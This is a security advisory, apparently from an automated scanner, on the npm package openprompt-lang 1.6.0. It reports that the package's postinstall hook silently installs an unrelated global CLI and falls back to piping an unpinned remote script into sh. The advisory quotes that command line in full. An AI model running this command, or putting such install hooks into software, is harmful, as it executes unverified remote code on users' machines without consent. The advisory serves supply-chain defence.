openprompt-lang @1.6.0

Summary

On every npm install , openprompt-lang's postinstall hook (scripts/postinstall.js:83) executes npm install -g @opencode/cli 2>/dev/null || curl -fsSL https://opencode.ai/install.sh 2>/dev/null | sh . The fallback fetches an unpinned shell script from opencode.ai and pipes it directly to sh with no version, no hash, and no integrity check. The destination domain is not the package's publisher (the package is published under a different GitHub identity) and the auto-installed tool is unrelated to the package's stated purpose (a prompt-engineering CLI). Whatever bytes opencode.ai serves at install time run on every consumer's machine, with no user prompt or opt-out. If opencode.ai is ever compromised, redirected, or the served script is modified, every installer of openprompt-lang executes the new payload. The same line additionally performs an unsolicited global install of an unrelated third-party CLI ( @opencode/cli ), mutating the developer's global npm environment as a side effect of installing this library.

Source: amazon-inspector (24ccd29557423c05fb49b14b0a9a2e1cfbe5a2b69a1276bc76d287edc46f4ec2)